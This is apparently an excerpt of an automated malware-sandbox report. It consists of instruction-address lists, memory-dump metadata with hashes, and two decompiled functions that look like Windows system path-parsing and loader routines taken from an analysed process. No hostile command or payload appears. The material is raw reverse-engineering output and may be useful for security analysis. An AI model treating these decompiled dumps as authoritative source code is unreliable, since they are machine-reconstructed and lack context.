0x1042ce9d
0x1042cea3
0x1042cea5
0x1042ceab
0x1042ceb1
0x1042ceb7
0x1042cebd
0x1042cec4
0x1042ceca
0x1042ced0
0x1042ced6
0x1042cedc
0x1042cee2
0x1042cee8
0x1042ceee
0x1042cef5
0x1042cefb
0x1042cefb
0x1042cf05
0x1042cf06
0x1042cf0c
0x1042cf1c
0x1042cf1c
0x1042cf22
0x1042cf28
0x1042cf2e
0x1042cf38
0x1042cf3f
0x1042cf45
0x1042cf4c
0x1042cf52
0x1042cf55
0x1042cf56
0x1042cf5c
0x1042cf5d
0x1042cf63
0x1042cf6a
0x1042cf70
0x1042cf76
0x1042cf7c
0x1042cf83
0x1042cf89
0x1042cf8f
0x1042cf95
0x1042cf9b
0x1042cf9c
0x1042cfa2
0x1042cfa8
0x1042cfae
0x1042cfb4
0x1042cfb5
0x1042cfb5
0x1042cfb5
0x1042cfbb
0x1042cfbb
0x1042cfc1
0x1042cfc7
0x1042cfcd
0x1042cfd7
0x1042cfd7
0x1042cfdd
0x1042cfe4
0x1042cfea
0x1042cff0
0x1042cff6
0x1042cffc
0x1042d003
0x1042d009
0x1042d00f
0x1042d010
0x1042d016
0x1042d01c
0x1042d01d
0x1042d023
0x1042d026
0x1042d02c
0x1042d032
0x1042d038
0x1042d039
0x1042d03c
0x1042d03d
0x1042d043
0x1042d049
0x1042d04f
0x1042d056
0x1042d057
0x1042d05d
0x1042d064
0x1042d066
0x1042d066
0x1042d06c
0x1042d072
0x1042d07e
0x1042d084
0x1042d08a
0x1042d090
0x1042d096
0x1042d097
0x1042d09d
0x1042d0a3
0x1042d0a9
0x1042d0b0
0x1042d0b6
0x1042d0bd
0x1042d0c3
0x1042d0c9
0x1042d0c9
0x1042d0c9
0x1042d0cf
0x1042d0d5
0x1042d0db
0x1042d0db
0x1042d0db
0x1042d0e1
0x1042d0e7
0x1042d0ed
0x1042d0f3
0x1042d0f9
0x1042d0f9
0x1042d100
0x1042d108
0x1042d10f
0x1042d116
0x1042d11c
0x1042d122
0x1042d128
0x1042d12e
0x1042d134
0x1042d13a
0x1042d141
0x1042d141
0x1042d141
0x1042d147
0x1042d147
0x1042d147
0x1042d14d
0x1042d153
0x1042d153
0x1042d153
0x1042d159
0x1042d15f
0x1042d165
0x1042d16c
0x1042d16e
0x1042d174
0x1042d17a
0x1042d180
0x1042d186
0x1042d188
0x1042d188
0x1042d18f
0x1042d18f
0x1042d18f
0x1042d195
0x1042d19c
0x1042d19d
0x1042d1a3
0x1042d1ad
0x1042d1b0
0x1042d1b0
0x1042d1b6
0x1042d1bc
0x1042d1c2
0x1042d1c9
0x1042d1cf
0x1042d1d6
0x1042d1d7
0x1042d1dd
0x1042d1e3
0x1042d1e9
0x1042d1ea
0x1042d1f0
0x1042d1f6
0x1042d1f8
0x1042d1fd
0x1042d203
0x1042d204
0x1042d209
0x1042d20f
0x1042d215
0x1042d221
0x1042d22b
0x1042d231
0x1042d237
0x1042d23e
0x1042d244
0x1042d24b
0x1042d24e
0x1042d24e
0x1042d24e
0x1042d254
0x1042d254
0x1042d1b6
0x1042d19d
0x1042d159
0x1042d128
0x1042d11c
0x1042d0ed
0x1042d072
0x1042cfe4
0x1042cfc7
0x1042cf0c
0x1042ce83
0x1042ce35
0x1042cdff
0x1042cdec
0x1042ccef
0x1042ccdd
0x1042cccb
0x1042cc9e
0x1042cc47
0x1042cc2f
0x1042cb84
0x1042c7b6
0x1042c7b6
0x1042c7b6
0x1042c7c2
0x1042c7d5
0x1042c7d7
0x1042c7de
0x1042c801
0x1042c809
0x1042c827
0x1042c82e
0x1042c835
0x1042c83a
0x1042c840
0x1042c841
0x1042c847
0x1042c858
0x1042c85f
0x1042c865
0x1042c86f
0x1042c875
0x00000000
0x00000000
0x1042c87b
0x1042c87b
0x1042c88e
0x1042c894
0x1042c89b
0x1042c8a1
0x1042c8a7
0x1042c8a9
0x1042c8b6
0x1042c8b7
0x1042c8bf
0x1042c8c0
0x1042c8c0
0x1042c8c0
0x1042c8c6
0x1042c8cc
0x1042c8d2
0x1042c8d8
0x1042c8de
0x1042c8e4
0x1042c8e5
0x1042c8eb
0x1042c7b6
0x1042c7b6
0x1042c7b6
0x1042c7c2
0x1042c7d5
0x1042c7d7
0x1042c7de
0x1042c801
0x1042c809
0x1042c827
0x1042c82e
0x1042c835
0x1042c83a
0x1042c840
0x1042c841
0x1042c847
0x1042c858
0x1042c85f
0x1042c865
0x1042c86f
0x1042c875
0x00000000
0x00000000
0x00000000
0x1042c7b6
0x1042c7b6
0x1042c7b6
0x00000000
0x00000000
0x00000000
0x1042c7b6
0x00000000
0x1042c7b6
0x1042c991
0x1042c998
0x1042c99e
0x1042c9a8
0x1042c9af
0x00000000
0x1042c9b5
0x1042c9c5
0x1042c9cb
0x1042c9d0
0x1042c9e6
0x1042c9ec
0x1042c9f3
0x1042c9f9
0x1042c9ff
0x1042ca06
0x1042ca0c
0x1042ca1a
0x1042ca20
0x1042ca21
0x1042ca27
0x00000000
0x1042ca2d
0x1042ca45
0x1042ca45
0x1042ca27
0x1042c9af
0x1042c7b6
0x1042c8f1
0x1042c8fb
0x1042c901
0x1042c908
0x1042c90f
0x1042c910
0x1042c91c
0x1042c91e
0x1042c92b
0x1042c93d
0x1042c943
0x1042c94a
0x1042c95a
0x1042c96a
0x1042c96b
0x1042c971
0x1042c973
0x1042c979
0x1042c7b6
0x1042c7b6
0x1042c7c2
0x1042c7d5
0x1042c7d7
0x1042c7de
0x1042c801
0x1042c809
0x1042c827
0x1042c82e
0x1042c835
0x1042c83a
0x1042c840
0x1042c841
0x1042c847
0x1042c858
0x1042c85f
0x1042c865
0x1042c86f
0x1042c86f

Memory Dump Source

Source File: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Offset: 10410000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 215b8afd0f380f202443118d235bdff5f9f16b72c88c4703e9bedaa97fe9bfa9
Instruction ID: 77fb4460f0611f555471a47bbbaf8eb55457540663f499668935a5d70fae00b7
Opcode Fuzzy Hash: 215b8afd0f380f202443118d235bdff5f9f16b72c88c4703e9bedaa97fe9bfa9
Instruction Fuzzy Hash: 3A3289329087D6CFD716CF38E99A7413FB6F786324B48425EC9A197592C338251ADF88

Uniqueness

Uniqueness Score: -1.00%

Function 03864120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E03864120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x393d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0387F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E03866E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L03864620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E03866E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M038645F8))) {
												case 0:
													_v568 = 0x3821078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x38211c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L03864620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0388F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0388F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E038452A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0385EB70(1, 0x39379a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0385AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E038895D0();
																			L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0388B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E03883D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0388B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x03864128
0x03864135
0x0386413c
0x03864141
0x03864145
0x03864147
0x0386414e
0x03864151
0x03864159
0x0386415c
0x03864160
0x03864164
0x03864168
0x0386416c
0x0386417f
0x03864181
0x0386446a
0x0386446a
0x0386418c
0x03864195
0x03864199
0x03864432
0x03864439
0x0386443d
0x03864442
0x03864447
0x00000000
0x0386419f
0x038641a3
0x038641b1
0x038641b9
0x038641bd
0x038645db
0x038645db
0x00000000
0x038641c3
0x038641c3
0x038641ce
0x038641d4
0x038ae138
0x038ae13e
0x038ae169
0x038ae16d
0x038ae19e
0x038ae16f
0x038ae16f
0x038ae175
0x038ae179
0x038ae18f
0x038ae193
0x00000000
0x038ae199
0x00000000
0x038ae199
0x038ae193
0x00000000
0x00000000
0x00000000
0x038641da
0x038641da
0x038641df
0x038641e4
0x038641ec
0x03864203
0x03864207
0x038ae1fd
0x03864222
0x03864226
0x038ae1f3
0x038ae1f3
0x0386422c
0x0386422c
0x03864233
0x038ae1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x03864239
0x03864239
0x03864239
0x03864239
0x03864233
0x03864226
0x038641ee
0x038641ee
0x038641f4
0x03864575
0x038ae1b1
0x038ae1b1
0x00000000
0x0386457b
0x0386457b
0x03864582
0x038ae1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x03864588
0x03864588
0x0386458c
0x038ae1c4
0x038ae1c4
0x00000000
0x03864592
0x03864592
0x03864599
0x038ae1be
0x00000000
0x00000000
0x00000000
0x00000000
0x0386459f
0x0386459f
0x038645a3
0x038ae1d7
0x038ae1e4
0x00000000
0x038645a9
0x038645a9
0x038645b0
0x038ae1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x038645b6
0x038645b6
0x038645b6
0x00000000
0x038645b6
0x038645b0
0x038645a3
0x03864599
0x0386458c
0x03864582
0x00000000
0x00000000
0x00000000
0x00000000
0x038641f4
0x0386423e
0x03864241
0x038645c0
0x038645c4
0x00000000
0x038645ca
0x038645ca
0x00000000
0x038ae207
0x038ae20f
0x00000000
0x00000000
0x00000000
0x00000000
0x038645d1
0x00000000
0x00000000
0x038645ca
0x00000000
0x03864247
0x03864247
0x03864247
0x03864249
0x03864249
0x03864249
0x03864251
0x03864251
0x03864257
0x0386425f
0x0386426e
0x03864270
0x0386427a
0x038ae219
0x038ae219
0x03864280
0x03864282
0x03864456
0x038645ea
0x00000000
0x038645f0
0x038ae223
0x00000000
0x038ae223
0x0386445c
0x0386445c
0x00000000
0x0386445c
0x00000000
0x03864288
0x0386428c
0x038ae298
0x03864292
0x03864292
0x0386429e
0x038642a3
0x038642a7
0x038642ac
0x038ae22d
0x038642b2
0x038642b2
0x038642b9
0x038642bc
0x038642c2
0x038642ca
0x038642cd
0x038642cd
0x038642d4
0x0386433f
0x0386433f
0x038642d6
0x038642d6
0x038642d9
0x038642dd
0x038642eb
0x038ae23a
0x038642f1
0x03864305
0x0386430d
0x03864315
0x03864318
0x0386431f
0x03864322
0x0386432e
0x0386433b
0x0386433b
0x00000000
0x0386432e
0x038642eb
0x0386434c
0x0386434e
0x03864352
0x03864359
0x0386435e
0x03864361
0x0386436e
0x0386438a
0x0386438e
0x03864396
0x0386439e
0x038643a1
0x038643ad
0x038643bb
0x038643bb
0x038643ad
0x0386436e
0x038643bf
0x038643c5
0x03864463
0x03864463
0x038643ce
0x038643d5
0x038643d9
0x038643df
0x03864475
0x03864479
0x03864491
0x03864491
0x03864479
0x038643e5
0x038643eb
0x038643f4
0x038643f6
0x038643f9
0x038643fc
0x038643ff
0x038644e8
0x038644ed
0x038644f3
0x038ae247
0x00000000
0x038644f9
0x03864504
0x03864508
0x0386450f
0x038ae269
0x00000000
0x03864515
0x03864519
0x03864531
0x03864534
0x03864537
0x0386453e
0x03864541
0x0386454a
0x038ae255
0x038ae255
0x038ae25b
0x038ae25e
0x038ae261
0x038ae261
0x03864555
0x03864559
0x0386455d
0x038ae26d
0x038ae270
0x038ae274
0x038ae27a
0x038ae27d
0x038ae28e
0x038ae28e
0x03864563
0x03864563
0x03864569
0x03864569
0x00000000
0x0386455d
0x0386450f
0x00000000
0x038644f3
0x038643ff
0x03864405
0x03864405
0x03864405
0x038642ac
0x0386428c
0x03864282
0x03864407
0x0386440d
0x038ae2af
0x038ae2af
0x03864413
0x03864413
0x00000000
0x038641d4
0x00000000
0x038641c3
0x038641bd
0x03864415
0x03864415
0x03864416
0x03864417
0x03864429
0x0386416e
0x0386416e
0x03864175
0x03864498
0x0386449f
0x038ae12d
0x00000000
0x038ae133
0x00000000
0x038ae133
0x038644a5
0x038644a5
0x038644aa
0x00000000
0x038644bb
0x038644ca
0x038644d6
0x038644d7
0x038644d8
0x038644e3
0x038644e3
0x038644aa
0x0386417b
0x0386417b
0x0386417b
0x00000000
0x0386417b
0x03864175
0x00000000

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d9d0c9abe7a945a754c7ea8b4d4b4930f74a9e48af209b7cca641aa4049522e
Instruction ID: e042a317a81a579b5edee1347a22f9ca7abfc1a1f934c2891bc7c959216033b1
Opcode Fuzzy Hash: 2d9d0c9abe7a945a754c7ea8b4d4b4930f74a9e48af209b7cca641aa4049522e
Instruction Fuzzy Hash: 0EF18E746087118BD724DFAAC490A3EB7E1FF88714F1849AEF886CB250E734D985CB52

Uniqueness

Uniqueness Score: -1.00%

Function 10412FB0, Relevance: .4, Instructions: 435COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Offset: 10410000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction ID: 120508e39a3f410068eaa1710026d8673b27f011239a5e1a2f019fe9bc6d47dd
Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction Fuzzy Hash: 9C026F73E547165FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90

Uniqueness

Uniqueness Score: -1.00%

Function 038720A0, Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E038720A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x3938714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E03872EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E03872EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E038458EC(_t240);
									_t221 =  *0x3935cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x3935cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E03884A2C(0x3936e40, 0x3884b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E03867D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
